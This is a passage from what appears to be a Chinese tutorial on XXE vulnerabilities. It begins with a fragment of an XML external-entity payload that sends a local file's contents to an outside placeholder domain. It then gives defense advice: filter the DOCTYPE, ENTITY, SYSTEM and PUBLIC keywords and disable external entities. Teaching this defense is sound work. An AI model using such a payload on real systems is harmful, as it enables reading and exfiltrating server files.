<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> XXE防御

过滤用户提交的XML数据，过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC，禁用外部实体引用。

转载注明出处：https://www.heiqu.com/wspwwd.html

浅入深出了解XXE漏洞 (2)

相关推荐